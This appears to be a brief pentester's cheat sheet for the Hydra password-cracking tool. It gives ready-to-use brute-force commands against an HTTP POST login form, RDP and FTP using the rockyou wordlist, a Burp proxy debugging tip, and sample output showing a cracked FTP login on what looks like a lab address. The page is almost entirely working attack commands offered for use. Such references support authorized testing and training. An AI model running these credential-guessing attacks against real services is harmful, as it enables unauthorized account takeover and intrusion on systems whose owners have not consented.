Skip to content

Hydra

HTTP Forms

Debug with Burpsuite :

$ HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra ...

POST form

$ hydra -l admin -P /opt/rockyou.txt '10.10.103.103' http-post-form \
    -m '/login:username=^USER^&password=^PASS^&submit=Log+in:Login failed'

RDP

$ hydra -t 1 -v -f -l 'administrator' -P /opt/rockyou.txt rdp://10.10.103.103

FTP

$ hydra -L users.lst -P passwords.lst 'ftp://10.10.110.187'
[...]
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://10.10.110.187:21/
[21][ftp] host: 10.10.110.187   login: paradox   password: ShibesAreGreat123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-13 19:47:34